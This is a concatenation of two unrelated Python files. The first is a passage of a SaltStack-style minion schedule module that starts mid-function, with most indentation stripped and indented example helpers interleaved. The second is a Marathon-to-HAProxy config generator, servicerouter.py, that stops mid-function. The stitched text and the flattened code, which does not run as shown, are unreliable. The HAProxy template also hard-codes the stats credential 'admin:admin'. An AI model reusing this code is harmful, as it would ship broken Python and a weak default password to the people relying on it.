if isinstance(kwargs['splay'], dict):
# Ensure ordering of start and end arguments
schedule[name]['splay'] = salt.utils.odict.OrderedDict()
schedule[name]['splay']['start'] = kwargs['splay']['start']
schedule[name]['splay']['end'] = kwargs['splay']['end']
else:
schedule[name]['splay'] = kwargs['splay']
for item in ['range', 'when', 'once', 'once_fmt', 'cron', 'returner',
'return_config', 'return_kwargs', 'until', 'enabled']:
if item in kwargs:
schedule[name][item] = kwargs[item]
# if enabled is not included in the job,
# assume job is enabled.
if 'enabled' not in kwargs:
schedule[name]['enabled'] = True
return schedule[name]
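# A minimal illustrative sketch (hypothetical job name and function; the
# leading underscore keeps it out of the loader's public functions): shows the
# dict shape produced by build_schedule_item() for a simple recurring job.
def _build_schedule_item_example():
    item = build_schedule_item('job1', function='test.ping', seconds=3600)
    # item is an OrderedDict equivalent to:
    # {'function': 'test.ping', 'seconds': 3600, 'maxrunning': 1,
    #  'name': 'job1', 'enabled': True, 'jid_include': True}
    # add() wraps this as {'job1': item} before firing the manage_schedule event.
    return item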
def add(name, **kwargs):
'''
Add a job to the schedule
CLI Example:
.. code-block:: bash
salt '*' schedule.add job1 function='test.ping' seconds=3600
        # If the function has arguments, use job_args
salt '*' schedule.add job2 function='cmd.run' job_args="['date >> /tmp/date.log']" seconds=60
'''
ret = {'comment': 'Failed to add job {0} to schedule.'.format(name),
'result': False}
if name in list_(show_all=True, return_yaml=False):
ret['comment'] = 'Job {0} already exists in schedule.'.format(name)
ret['result'] = False
return ret
    if not name:
        ret['comment'] = 'Job name is required.'
        ret['result'] = False
        return ret
time_conflict = False
for item in ['seconds', 'minutes', 'hours', 'days']:
if item in kwargs and 'when' in kwargs:
time_conflict = True
if item in kwargs and 'cron' in kwargs:
time_conflict = True
if time_conflict:
ret['comment'] = 'Error: Unable to use "seconds", "minutes", "hours", or "days" with "when" or "cron" options.'
return ret
if 'when' in kwargs and 'cron' in kwargs:
ret['comment'] = 'Unable to use "when" and "cron" options together. Ignoring.'
return ret
persist = True
if 'persist' in kwargs:
persist = kwargs['persist']
_new = build_schedule_item(name, **kwargs)
schedule_data = {}
schedule_data[name] = _new
if 'test' in kwargs and kwargs['test']:
ret['comment'] = 'Job: {0} would be added to schedule.'.format(name)
ret['result'] = True
else:
try:
eventer = salt.utils.event.get_event('minion', opts=__opts__)
res = __salt__['event.fire']({'name': name,
'schedule': schedule_data,
'func': 'add',
'persist': persist}, 'manage_schedule')
if res:
event_ret = eventer.get_event(tag='/salt/minion/minion_schedule_add_complete', wait=30)
if event_ret and event_ret['complete']:
schedule = event_ret['schedule']
if name in schedule:
ret['result'] = True
ret['comment'] = 'Added job: {0} to schedule.'.format(name)
return ret
except KeyError:
# Effectively a no-op, since we can't really return without an event system
ret['comment'] = 'Event module not available. Schedule add failed.'
return ret
def modify(name, **kwargs):
'''
Modify an existing job in the schedule
CLI Example:
.. code-block:: bash
salt '*' schedule.modify job1 function='test.ping' seconds=3600
'''
ret = {'comment': '',
'changes': {},
'result': True}
time_conflict = False
for item in ['seconds', 'minutes', 'hours', 'days']:
if item in kwargs and 'when' in kwargs:
time_conflict = True
if item in kwargs and 'cron' in kwargs:
time_conflict = True
if time_conflict:
ret['result'] = False
ret['comment'] = 'Error: Unable to use "seconds", "minutes", "hours", or "days" with "when" option.'
return ret
if 'when' in kwargs and 'cron' in kwargs:
ret['result'] = False
ret['comment'] = 'Unable to use "when" and "cron" options together. Ignoring.'
return ret
current_schedule = list_(show_all=True, return_yaml=False)
if name not in current_schedule:
ret['comment'] = 'Job {0} does not exist in schedule.'.format(name)
ret['result'] = False
return ret
_current = current_schedule[name]
if '_seconds' in _current:
_current['seconds'] = _current['_seconds']
del _current['_seconds']
_new = build_schedule_item(name, **kwargs)
if _new == _current:
        ret['comment'] = 'Job {0} is in the correct state'.format(name)
return ret
_current_lines = ['{0}:{1}\n'.format(key, value)
for (key, value) in sorted(_current.items())]
_new_lines = ['{0}:{1}\n'.format(key, value)
for (key, value) in sorted(_new.items())]
_diff = difflib.unified_diff(_current_lines, _new_lines)
ret['changes']['diff'] = ''.join(_diff)
if 'test' in kwargs and kwargs['test']:
ret['comment'] = 'Job: {0} would be modified in schedule.'.format(name)
else:
persist = True
if 'persist' in kwargs:
persist = kwargs['persist']
if name in list_(show_all=True, where='opts', return_yaml=False):
event_data = {'name': name,
'schedule': _new,
'func': 'modify',
'persist': persist}
elif name in list_(show_all=True, where='pillar', return_yaml=False):
event_data = {'name': name,
'schedule': _new,
'where': 'pillar',
'func': 'modify',
'persist': False}
out = __salt__['event.fire'](event_data, 'manage_schedule')
if out:
ret['comment'] = 'Modified job: {0} in schedule.'.format(name)
else:
ret['comment'] = 'Failed to modify job {0} in schedule.'.format(name)
ret['result'] = False
return ret
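# A minimal illustrative sketch (hypothetical values; not exposed by the
# loader): modify() reports changes by diffing sorted 'key:value' lines of the
# current and new job definitions with difflib.unified_diff.
def _schedule_diff_example():
    _current = {'function': 'test.ping', 'seconds': 60}
    _new = {'function': 'test.ping', 'seconds': 3600}
    current_lines = ['{0}:{1}\n'.format(key, value)
                     for (key, value) in sorted(_current.items())]
    new_lines = ['{0}:{1}\n'.format(key, value)
                 for (key, value) in sorted(_new.items())]
    # the joined diff contains '-seconds:60' and '+seconds:3600' lines
    return ''.join(difflib.unified_diff(current_lines, new_lines))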
def run_job(name, force=False):
'''
Run a scheduled job on the minion immediately
CLI Example:
.. code-block:: bash
salt '*' schedule.run_job job1
salt '*' schedule.run_job job1 force=True
Force the job to run even if it is disabled.
'''
ret = {'comment': [],
'result': True}
    if not name:
        ret['comment'] = 'Job name is required.'
        ret['result'] = False
        return ret
schedule = list_(show_all=True, return_yaml=False)
if name in schedule:
data = schedule[name]
if 'enabled' in data and not data['enabled'] and not force:
ret['comment'] = 'Job {0} is disabled.'.format(name)
else:
out = __salt__['event.fire']({'name': name, 'func': 'run_job'}, 'manage_schedule')
if out:
ret['comment'] = 'Scheduling Job {0} on minion.'.format(name)
else:
ret['comment'] = 'Failed to run job {0} on minion.'.format(name)
ret['result'] = False
else:
ret['comment'] = 'Job {0} does not exist.'.format(name)
ret['result'] = False
return ret
def enable_job(name, **kwargs):
'''
Enable a job in the minion's schedule
CLI Example:
.. code-block:: bash
salt '*' schedule.enable_job job1
'''
ret = {'comment': [],
'result': True}
    if not name:
        ret['comment'] = 'Job name is required.'
        ret['result'] = False
        return ret
if 'test' in __opts__ and __opts__['test']:
ret['comment'] = 'Job: {0} would be enabled in schedule.'.format(name)
else:
persist = True
if 'persist' in kwargs:
persist = kwargs['persist']
if name in list_(show_all=True, where='opts', return_yaml=False):
event_data = {'name': name, 'func': 'enable_job', 'persist': persist}
elif name in list_(show_all=True, where='pillar', return_yaml=False):
event_data = {'name': name, 'where': 'pillar', 'func': 'enable_job', 'persist': False}
else:
ret['comment'] = 'Job {0} does not exist.'.format(name)
ret['result'] = False
return ret
try:
eventer = salt.utils.event.get_event('minion', opts=__opts__)
res = __salt__['event.fire'](event_data, 'manage_schedule')
if res:
event_ret = eventer.get_event(tag='/salt/minion/minion_schedule_enabled_job_complete', wait=30)
if event_ret and event_ret['complete']:
schedule = event_ret['schedule']
# check item exists in schedule and is enabled
if name in schedule and schedule[name]['enabled']:
ret['result'] = True
ret['comment'] = 'Enabled Job {0} in schedule.'.format(name)
else:
ret['result'] = False
ret['comment'] = 'Failed to enable job {0} in schedule.'.format(name)
return ret
except KeyError:
# Effectively a no-op, since we can't really return without an event system
ret['comment'] = 'Event module not available. Schedule enable job failed.'
return ret
def disable_job(name, **kwargs):
'''
Disable a job in the minion's schedule
CLI Example:
.. code-block:: bash
salt '*' schedule.disable_job job1
'''
ret = {'comment': [],
'result': True}
    if not name:
        ret['comment'] = 'Job name is required.'
        ret['result'] = False
        return ret
if 'test' in kwargs and kwargs['test']:
ret['comment'] = 'Job: {0} would be disabled in schedule.'.format(name)
else:
persist = True
if 'persist' in kwargs:
persist = kwargs['persist']
if name in list_(show_all=True, where='opts', return_yaml=False):
event_data = {'name': name, 'func': 'disable_job', 'persist': persist}
        elif name in list_(show_all=True, where='pillar', return_yaml=False):
event_data = {'name': name, 'where': 'pillar', 'func': 'disable_job', 'persist': False}
else:
ret['comment'] = 'Job {0} does not exist.'.format(name)
ret['result'] = False
return ret
try:
eventer = salt.utils.event.get_event('minion', opts=__opts__)
res = __salt__['event.fire'](event_data, 'manage_schedule')
if res:
event_ret = eventer.get_event(tag='/salt/minion/minion_schedule_disabled_job_complete', wait=30)
if event_ret and event_ret['complete']:
schedule = event_ret['schedule']
# check item exists in schedule and is enabled
if name in schedule and not schedule[name]['enabled']:
ret['result'] = True
ret['comment'] = 'Disabled Job {0} in schedule.'.format(name)
else:
ret['result'] = False
ret['comment'] = 'Failed to disable job {0} in schedule.'.format(name)
return ret
except KeyError:
# Effectively a no-op, since we can't really return without an event system
            ret['comment'] = 'Event module not available. Schedule disable job failed.'
return ret
def save(**kwargs):
'''
Save all scheduled jobs on the minion
CLI Example:
.. code-block:: bash
salt '*' schedule.save
'''
ret = {'comment': [],
'result': True}
if 'test' in kwargs and kwargs['test']:
ret['comment'] = 'Schedule would be saved.'
else:
try:
eventer = salt.utils.event.get_event('minion', opts=__opts__)
res = __salt__['event.fire']({'func': 'save_schedule'}, 'manage_schedule')
if res:
event_ret = eventer.get_event(tag='/salt/minion/minion_schedule_saved', wait=30)
if event_ret and event_ret['complete']:
ret['result'] = True
ret['comment'] = 'Schedule (non-pillar items) saved.'
else:
ret['result'] = False
ret['comment'] = 'Failed to save schedule.'
except KeyError:
# Effectively a no-op, since we can't really return without an event system
ret['comment'] = 'Event module not available. Schedule save failed.'
return ret
def enable(**kwargs):
'''
Enable all scheduled jobs on the minion
CLI Example:
.. code-block:: bash
salt '*' schedule.enable
'''
ret = {'comment': [],
'result': True}
if 'test' in kwargs and kwargs['test']:
ret['comment'] = 'Schedule would be enabled.'
else:
try:
eventer = salt.utils.event.get_event('minion', opts=__opts__)
res = __salt__['event.fire']({'func': 'enable'}, 'manage_schedule')
if res:
event_ret = eventer.get_event(tag='/salt/minion/minion_schedule_enabled_complete', wait=30)
if event_ret and event_ret['complete']:
schedule = event_ret['schedule']
if 'enabled' in schedule and schedule['enabled']:
ret['result'] = True
ret['comment'] = 'Enabled schedule on minion.'
else:
ret['result'] = False
ret['comment'] = 'Failed to enable schedule on minion.'
return ret
except KeyError:
# Effectively a no-op, since we can't really return without an event system
            ret['comment'] = 'Event module not available. Schedule enable failed.'
return ret
def disable(**kwargs):
'''
Disable all scheduled jobs on the minion
CLI Example:
.. code-block:: bash
salt '*' schedule.disable
'''
ret = {'comment': [],
'result': True}
if 'test' in kwargs and kwargs['test']:
ret['comment'] = 'Schedule would be disabled.'
else:
try:
eventer = salt.utils.event.get_event('minion', opts=__opts__)
res = __salt__['event.fire']({'func': 'disable'}, 'manage_schedule')
if res:
event_ret = eventer.get_event(tag='/salt/minion/minion_schedule_disabled_complete', wait=30)
if event_ret and event_ret['complete']:
schedule = event_ret['schedule']
if 'enabled' in schedule and not schedule['enabled']:
ret['result'] = True
ret['comment'] = 'Disabled schedule on minion.'
else:
ret['result'] = False
ret['comment'] = 'Failed to disable schedule on minion.'
return ret
except KeyError:
# Effectively a no-op, since we can't really return without an event system
            ret['comment'] = 'Event module not available. Schedule disable failed.'
return ret
def reload_():
'''
Reload saved scheduled jobs on the minion
CLI Example:
.. code-block:: bash
salt '*' schedule.reload
'''
ret = {'comment': [],
'result': True}
    # If there is a schedule defined in pillar, refresh it.
if 'schedule' in __pillar__:
out = __salt__['event.fire']({}, 'pillar_refresh')
if out:
ret['comment'].append('Reloaded schedule from pillar on minion.')
else:
ret['comment'].append('Failed to reload schedule from pillar on minion.')
ret['result'] = False
    # TODO: move this file path into a configurable option
sfn = '{0}/{1}/schedule.conf'.format(__opts__['config_dir'], os.path.dirname(__opts__['default_include']))
if os.path.isfile(sfn):
with salt.utils.fopen(sfn, 'rb') as fp_:
try:
schedule = yaml.safe_load(fp_.read())
except yaml.YAMLError as exc:
                schedule = None
                ret['comment'].append('Unable to read existing schedule file: {0}'.format(exc))
if schedule:
if 'schedule' in schedule and schedule['schedule']:
out = __salt__['event.fire']({'func': 'reload', 'schedule': schedule}, 'manage_schedule')
if out:
ret['comment'].append('Reloaded schedule on minion from schedule.conf.')
else:
ret['comment'].append('Failed to reload schedule on minion from schedule.conf.')
ret['result'] = False
else:
ret['comment'].append('Failed to reload schedule on minion. Saved file is empty or invalid.')
ret['result'] = False
else:
ret['comment'].append('Failed to reload schedule on minion. Saved file is empty or invalid.')
ret['result'] = False
return ret
def move(name, target, **kwargs):
'''
Move scheduled job to another minion or minions.
CLI Example:
.. code-block:: bash
salt '*' schedule.move jobname target
'''
ret = {'comment': [],
'result': True}
    if not name:
        ret['comment'] = 'Job name is required.'
        ret['result'] = False
        return ret
if 'test' in kwargs and kwargs['test']:
ret['comment'] = 'Job: {0} would be moved from schedule.'.format(name)
else:
opts_schedule = list_(show_all=True, where='opts', return_yaml=False)
pillar_schedule = list_(show_all=True, where='pillar', return_yaml=False)
if name in opts_schedule:
schedule_data = opts_schedule[name]
where = None
elif name in pillar_schedule:
schedule_data = pillar_schedule[name]
where = 'pillar'
else:
ret['comment'] = 'Job {0} does not exist.'.format(name)
ret['result'] = False
return ret
schedule_opts = []
for key, value in six.iteritems(schedule_data):
temp = '{0}={1}'.format(key, value)
schedule_opts.append(temp)
response = __salt__['publish.publish'](target, 'schedule.add', schedule_opts)
        # Get errors and list of affected minions
errors = []
minions = []
for minion in response:
minions.append(minion)
if not response[minion]:
errors.append(minion)
# parse response
if not response:
ret['comment'] = 'no servers answered the published schedule.add command'
return ret
elif len(errors) > 0:
            ret['comment'] = 'the following minions returned False'
ret['minions'] = errors
return ret
else:
delete(name, where=where)
ret['result'] = True
ret['comment'] = 'Moved Job {0} from schedule.'.format(name)
ret['minions'] = minions
return ret
return ret
def copy(name, target, **kwargs):
'''
Copy scheduled job to another minion or minions.
CLI Example:
.. code-block:: bash
salt '*' schedule.copy jobname target
'''
ret = {'comment': [],
'result': True}
    if not name:
        ret['comment'] = 'Job name is required.'
        ret['result'] = False
        return ret
if 'test' in kwargs and kwargs['test']:
ret['comment'] = 'Job: {0} would be copied from schedule.'.format(name)
else:
opts_schedule = list_(show_all=True, where='opts', return_yaml=False)
pillar_schedule = list_(show_all=True, where='pillar', return_yaml=False)
if name in opts_schedule:
schedule_data = opts_schedule[name]
elif name in pillar_schedule:
schedule_data = pillar_schedule[name]
else:
ret['comment'] = 'Job {0} does not exist.'.format(name)
ret['result'] = False
return ret
schedule_opts = []
for key, value in six.iteritems(schedule_data):
temp = '{0}={1}'.format(key, value)
schedule_opts.append(temp)
response = __salt__['publish.publish'](target, 'schedule.add', schedule_opts)
        # Get errors and list of affected minions
errors = []
minions = []
for minion in response:
minions.append(minion)
if not response[minion]:
errors.append(minion)
# parse response
if not response:
ret['comment'] = 'no servers answered the published schedule.add command'
return ret
elif len(errors) > 0:
            ret['comment'] = 'the following minions returned False'
ret['minions'] = errors
return ret
else:
ret['result'] = True
ret['comment'] = 'Copied Job {0} from schedule to minion(s).'.format(name)
ret['minions'] = minions
return ret
return ret
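# A minimal illustrative sketch (hypothetical job definition; not exposed by
# the loader): move() and copy() flatten a job definition into 'key=value'
# strings so it can be forwarded to schedule.add on the target minions via
# publish.publish.
def _schedule_opts_example():
    schedule_data = {'name': 'job1', 'function': 'test.ping', 'seconds': 3600}
    schedule_opts = ['{0}={1}'.format(key, value)
                     for key, value in schedule_data.items()]
    # e.g. ['name=job1', 'function=test.ping', 'seconds=3600'], which the
    # target minions receive as arguments to schedule.add
    return schedule_opts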
|
|
#!/usr/bin/env python2
"""Overview:
The servicerouter is a replacement for the haproxy-marathon-bridge.
It reads the Marathon task information and dynamically generates
haproxy configuration details.
To gather the task information, the servicerouter needs to know where
to find Marathon. The service configuration details are stored in Marathon
environment variables.
Every service port in Marathon can be configured independently.
Features:
- Virtual Host aliases for services
- Soft restart of haproxy
- SSL Termination
- (Optional): real-time update from Marathon events
Configuration:
Service configuration lives in Marathon via environment variables.
The servicerouter just needs to know where to find marathon.
To run in listening mode you must also specify the address + port at
which the servicerouter can be reached by marathon.
Usage:
$ servicerouter.py --marathon http://marathon1:8080 \
--haproxy-config /etc/haproxy/haproxy.cfg
The user that executes servicerouter must have the permission to reload
haproxy.
Environment Variables:
HAPROXY_GROUP
The group of servicerouter instances that point to the service.
Service routers with the group '*' will collect all groups.
HAPROXY_{n}_VHOST
The Marathon HTTP Virtual Host proxy hostname to gather.
Ex: HAPROXY_0_VHOST = 'marathon.mesosphere.com'
HAPROXY_{n}_STICKY
Enable sticky request routing for the service.
Ex: HAPROXY_0_STICKY = true
HAPROXY_{n}_REDIRECT_TO_HTTPS
Redirect HTTP traffic to HTTPS.
Ex: HAPROXY_0_REDIRECT_TO_HTTPS = true
HAPROXY_{n}_SSL_CERT
Enable the given SSL certificate for TLS/SSL traffic.
Ex: HAPROXY_0_SSL_CERT = '/etc/ssl/certs/marathon.mesosphere.com'
HAPROXY_{n}_BIND_ADDR
Bind to the specific address for the service.
Ex: HAPROXY_0_BIND_ADDR = '10.0.0.42'
HAPROXY_{n}_PORT
Bind to the specific port for the service.
This overrides the servicePort which has to be unique.
Ex: HAPROXY_0_PORT = 80
HAPROXY_{n}_MODE
Set the connection mode to either TCP or HTTP. The default is TCP.
Ex: HAPROXY_0_MODE = 'http'
Templates:
The servicerouter searches for configuration files in the templates/
directory. The templates/ directory contains servicerouter configuration
settings and example usage. The templates/ directory is resolved relative
to the directory from which the script is run.
HAPROXY_HEAD
The head of the haproxy config. This contains global settings
and defaults.
HAPROXY_HTTP_FRONTEND_HEAD
An HTTP frontend that binds to port *:80 by default and gathers
all virtual hosts as defined by the HAPROXY_{n}_VHOST variable.
HAPROXY_HTTPS_FRONTEND_HEAD
An HTTPS frontend for encrypted connections that binds to port *:443 by
default and gathers all virtual hosts as defined by the
HAPROXY_{n}_VHOST variable. You must modify this file to
include your certificate.
HAPROXY_BACKEND_REDIRECT_HTTP_TO_HTTPS
This template is used with backends where the
HAPROXY_{n}_REDIRECT_TO_HTTPS environment variable is defined.
HAPROXY_BACKEND_HTTP_OPTIONS
Sets HTTP headers, for example X-Forwarded-For and X-Forwarded-Proto.
HAPROXY_BACKEND_STICKY_OPTIONS
Sets a cookie for services where HAPROXY_{n}_STICKY is true.
HAPROXY_FRONTEND_HEAD
Defines the address and port to bind to.
HAPROXY_BACKEND_HEAD
Defines the type of load balancing, roundrobin by default,
and connection mode, TCP or HTTP.
HAPROXY_HTTP_FRONTEND_ACL
The ACL that glues a backend to the corresponding virtual host
of the HAPROXY_HTTP_FRONTEND_HEAD.
HAPROXY_HTTPS_FRONTEND_ACL
The ACL that performs the SNI based hostname matching
for the HAPROXY_HTTPS_FRONTEND_HEAD.
HAPROXY_BACKEND_SERVER_OPTIONS
The options for each physical server added to a backend.
HAPROXY_FRONTEND_BACKEND_GLUE
This option glues the backend to the frontend.
Operational Notes:
- When a node in listening mode fails, remove the callback url for that
node in marathon.
"""
from logging.handlers import SysLogHandler
from operator import attrgetter
from shutil import move
from tempfile import mkstemp
from textwrap import dedent
from wsgiref.simple_server import make_server
import argparse
import json
import logging
import os.path
import re
import requests
import subprocess
import sys
class ConfigTemplater(object):
HAPROXY_HEAD = dedent('''\
global
daemon
log 127.0.0.1 local0
log 127.0.0.1 local1 notice
maxconn 4096
tune.ssl.default-dh-param 2048
defaults
log global
retries 3
maxconn 2000
timeout connect 5s
timeout client 50s
timeout server 50s
listen stats
bind 127.0.0.1:9090
balance
mode http
stats enable
stats auth admin:admin
''')
HAPROXY_HTTP_FRONTEND_HEAD = dedent('''
frontend marathon_http_in
bind *:80
mode http
''')
# TODO(lloesche): make certificate path dynamic and allow multiple certs
HAPROXY_HTTPS_FRONTEND_HEAD = dedent('''
frontend marathon_https_in
bind *:443 ssl crt /etc/ssl/mesosphere.com.pem
mode http
''')
HAPROXY_FRONTEND_HEAD = dedent('''
frontend {backend}
bind {bindAddr}:{servicePort}{sslCertOptions}
mode {mode}
''')
HAPROXY_BACKEND_HEAD = dedent('''
backend {backend}
balance roundrobin
mode {mode}
''')
HAPROXY_BACKEND_REDIRECT_HTTP_TO_HTTPS = '''\
bind {bindAddr}:80
redirect scheme https if !{{ ssl_fc }}
'''
HAPROXY_HTTP_FRONTEND_ACL = '''\
acl host_{cleanedUpHostname} hdr(host) -i {hostname}
use_backend {backend} if host_{cleanedUpHostname}
'''
HAPROXY_HTTPS_FRONTEND_ACL = '''\
use_backend {backend} if {{ ssl_fc_sni {hostname} }}
'''
HAPROXY_BACKEND_HTTP_OPTIONS = '''\
option forwardfor
http-request set-header X-Forwarded-Port %[dst_port]
http-request add-header X-Forwarded-Proto https if { ssl_fc }
'''
HAPROXY_BACKEND_STICKY_OPTIONS = '''\
cookie mesosphere_server_id insert indirect nocache
'''
HAPROXY_BACKEND_SERVER_OPTIONS = '''\
server {serverName} {host}:{port}{cookieOptions}
'''
HAPROXY_FRONTEND_BACKEND_GLUE = '''\
use_backend {backend}
'''
def __init__(self, directory='templates'):
self.__template_directory = directory
self.__load_templates()
def __load_templates(self):
        '''Loads template files if they exist, otherwise it sets defaults'''
variables = [
'HAPROXY_HEAD',
'HAPROXY_HTTP_FRONTEND_HEAD',
'HAPROXY_HTTPS_FRONTEND_HEAD',
'HAPROXY_FRONTEND_HEAD',
'HAPROXY_BACKEND_REDIRECT_HTTP_TO_HTTPS',
'HAPROXY_BACKEND_HEAD',
'HAPROXY_HTTP_FRONTEND_ACL',
'HAPROXY_HTTPS_FRONTEND_ACL',
'HAPROXY_BACKEND_HTTP_OPTIONS',
'HAPROXY_BACKEND_STICKY_OPTIONS',
'HAPROXY_BACKEND_SERVER_OPTIONS',
'HAPROXY_FRONTEND_BACKEND_GLUE',
]
for variable in variables:
try:
filename = os.path.join(self.__template_directory, variable)
with open(filename) as f:
logger.info('overriding %s from %s', variable, filename)
setattr(self, variable, f.read())
except IOError:
logger.debug("setting default value for %s", variable)
try:
setattr(self, variable, getattr(self.__class__, variable))
except AttributeError:
logger.exception('default not found, aborting.')
raise
@property
def haproxy_head(self):
return self.HAPROXY_HEAD
@property
def haproxy_http_frontend_head(self):
return self.HAPROXY_HTTP_FRONTEND_HEAD
@property
def haproxy_https_frontend_head(self):
return self.HAPROXY_HTTPS_FRONTEND_HEAD
@property
def haproxy_frontend_head(self):
return self.HAPROXY_FRONTEND_HEAD
@property
def haproxy_backend_redirect_http_to_https(self):
return self.HAPROXY_BACKEND_REDIRECT_HTTP_TO_HTTPS
@property
def haproxy_backend_head(self):
return self.HAPROXY_BACKEND_HEAD
@property
def haproxy_http_frontend_acl(self):
return self.HAPROXY_HTTP_FRONTEND_ACL
@property
def haproxy_https_frontend_acl(self):
return self.HAPROXY_HTTPS_FRONTEND_ACL
@property
def haproxy_backend_http_options(self):
return self.HAPROXY_BACKEND_HTTP_OPTIONS
@property
def haproxy_backend_sticky_options(self):
return self.HAPROXY_BACKEND_STICKY_OPTIONS
@property
def haproxy_backend_server_options(self):
return self.HAPROXY_BACKEND_SERVER_OPTIONS
@property
def haproxy_frontend_backend_glue(self):
return self.HAPROXY_FRONTEND_BACKEND_GLUE
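# Illustrative override layout (hypothetical paths): any of the variables
# listed in __load_templates() can be overridden by dropping a file of the
# same name into the templates/ directory, for example:
#
#   templates/HAPROXY_HEAD          # replace the global/defaults section
#   templates/HAPROXY_BACKEND_HEAD  # e.g. switch 'balance roundrobin' to
#                                   # 'balance leastconn'
#
# ConfigTemplater('templates') reads those files at startup and falls back to
# the class-level defaults for anything that is missing.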
def string_to_bool(s):
return s.lower() in ["true", "t", "yes", "y"]
def set_hostname(x, y):
x.hostname = y
def set_sticky(x, y):
x.sticky = string_to_bool(y)
def set_redirect_http_to_https(x, y):
x.redirectHttpToHttps = string_to_bool(y)
def set_sslCert(x, y):
x.sslCert = y
def set_bindAddr(x, y):
x.bindAddr = y
def set_port(x, y):
x.servicePort = int(y)
def set_mode(x, y):
x.mode = y
env_keys = {
'HAPROXY_{0}_VHOST': set_hostname,
'HAPROXY_{0}_STICKY': set_sticky,
'HAPROXY_{0}_REDIRECT_TO_HTTPS': set_redirect_http_to_https,
'HAPROXY_{0}_SSL_CERT': set_sslCert,
'HAPROXY_{0}_BIND_ADDR': set_bindAddr,
'HAPROXY_{0}_PORT': set_port,
'HAPROXY_{0}_MODE': set_mode
}
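# A minimal illustrative sketch (hypothetical app id, port and values; never
# called): how a Marathon app's environment maps onto a MarathonService
# through env_keys, mirroring what get_apps() does further down for each
# service port index.
def _apply_env_example():
    service = MarathonService('/web', 10000)
    env = {'HAPROXY_0_VHOST': 'web.example.com', 'HAPROXY_0_STICKY': 'true'}
    for key_unformatted, setter in env_keys.items():
        key = key_unformatted.format(0)  # 'HAPROXY_{0}_VHOST' -> 'HAPROXY_0_VHOST'
        if key in env:
            setter(service, env[key])
    # service.hostname == 'web.example.com', service.sticky is True
    return service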
logger = logging.getLogger('servicerouter')
class MarathonBackend(object):
def __init__(self, host, port):
self.host = host
self.port = port
def __hash__(self):
return hash((self.host, self.port))
def __repr__(self):
return "MarathonBackend(%r, %r)" % (self.host, self.port)
class MarathonService(object):
def __init__(self, appId, servicePort):
self.appId = appId
self.servicePort = servicePort
self.backends = set()
self.hostname = None
self.sticky = False
self.redirectHttpToHttps = False
self.sslCert = None
self.bindAddr = '*'
self.mode = 'tcp'
self.groups = frozenset()
def add_backend(self, host, port):
self.backends.add(MarathonBackend(host, port))
def __hash__(self):
return hash(self.servicePort)
def __eq__(self, other):
return self.servicePort == other.servicePort
def __repr__(self):
return "MarathonService(%r, %r)" % (self.appId, self.servicePort)
class MarathonApp(object):
def __init__(self, marathon, appId):
self.app = marathon.get_app(appId)
self.groups = frozenset()
self.appId = appId
# port -> MarathonService
self.services = dict()
def __hash__(self):
return hash(self.appId)
def __eq__(self, other):
return self.appId == other.appId
class Marathon(object):
def __init__(self, hosts):
# TODO(cmaloney): Support getting master list from zookeeper
self.__hosts = hosts
def api_req_raw(self, method, path, body=None, **kwargs):
for host in self.__hosts:
path_str = os.path.join(host, 'v2')
if len(path) == 2:
assert(path[0] == 'apps')
path_str += '/apps/{0}'.format(path[1])
else:
path_str += '/' + path[0]
response = requests.request(
method,
path_str,
headers={
'Accept': 'application/json',
'Content-Type': 'application/json'
},
**kwargs
)
if response.status_code == 200:
break
response.raise_for_status()
return response
def api_req(self, method, path, **kwargs):
return self.api_req_raw(method, path, **kwargs).json()
def create(self, app_json):
return self.api_req('POST', ['apps'], app_json)
def get_app(self, appid):
return self.api_req('GET', ['apps', appid])["app"]
# Lists all running apps.
def list(self):
return self.api_req('GET', ['apps'])["apps"]
def tasks(self):
return self.api_req('GET', ['tasks'])["tasks"]
def add_subscriber(self, callbackUrl):
return self.api_req(
'POST',
['eventSubscriptions'],
params={'callbackUrl': callbackUrl})
def remove_subscriber(self, callbackUrl):
return self.api_req(
'DELETE',
['eventSubscriptions'],
params={'callbackUrl': callbackUrl})
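# Illustrative mapping (hypothetical host): how the path list passed to
# Marathon.api_req()/api_req_raw() becomes a v2 API URL:
#   ['apps']              -> http://marathon1:8080/v2/apps
#   ['tasks']             -> http://marathon1:8080/v2/tasks
#   ['apps', '/some/app'] -> http://marathon1:8080/v2/apps//some/app
# (Marathon appIds carry a leading slash, so the resulting URL contains a
# double slash.)
# Usage sketch: marathon = Marathon(['http://marathon1:8080']); marathon.list()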
def has_group(groups, app_groups):
# All groups / wildcard match
if '*' in groups:
return True
# empty group only
if len(groups) == 0 and len(app_groups) == 0:
return True
# Contains matching groups
if (len(frozenset(app_groups) & groups)):
return True
return False
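# A minimal illustrative sketch (hypothetical group names; never called) of
# the three matching rules implemented by has_group().
def _has_group_examples():
    assert has_group(frozenset(['*']), ['prod'])            # wildcard matches anything
    assert has_group(frozenset(), [])                       # no groups matches apps without groups
    assert has_group(frozenset(['prod']), ['prod', 'qa'])   # any overlap is enough
    assert not has_group(frozenset(['prod']), ['qa'])       # no overlap, no match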
def config(apps, groups):
logger.info("generating config")
templater = ConfigTemplater()
config = templater.haproxy_head
groups = frozenset(groups)
http_frontends = templater.haproxy_http_frontend_head
https_frontends = templater.haproxy_https_frontend_head
frontends = str()
backends = str()
for app in sorted(apps, key=attrgetter('appId', 'servicePort')):
        # App only applies if we have its group
if not has_group(groups, app.groups):
continue
logger.debug("configuring app %s", app.appId)
backend = app.appId[1:].replace('/', '_') + '_' + str(app.servicePort)
logger.debug("frontend at %s:%d with backend %s",
app.bindAddr, app.servicePort, backend)
        # if the app has a hostname set, force the mode to http,
        # otherwise recent versions of haproxy refuse to start
if app.hostname:
app.mode = 'http'
frontend_head = templater.haproxy_frontend_head
frontends += frontend_head.format(
bindAddr=app.bindAddr,
backend=backend,
servicePort=app.servicePort,
mode=app.mode,
sslCertOptions=' ssl crt ' + app.sslCert if app.sslCert else ''
)
if app.redirectHttpToHttps:
logger.debug("rule to redirect http to https traffic")
haproxy_backend_redirect_http_to_https = \
templater.haproxy_backend_redirect_http_to_https
frontends += haproxy_backend_redirect_http_to_https.format(
bindAddr=app.bindAddr)
backend_head = templater.haproxy_backend_head
backends += backend_head.format(
backend=backend,
mode=app.mode
)
# if a hostname is set we add the app to the vhost section
# of our haproxy config
# TODO(lloesche): Check if the hostname is already defined by another
# service
if app.hostname:
logger.debug(
"adding virtual host for app with hostname %s", app.hostname)
cleanedUpHostname = re.sub(r'[^a-zA-Z0-9\-]', '_', app.hostname)
http_frontend_acl = templater.haproxy_http_frontend_acl
http_frontends += http_frontend_acl.format(
cleanedUpHostname=cleanedUpHostname,
hostname=app.hostname,
backend=backend
)
https_frontend_acl = templater.haproxy_https_frontend_acl
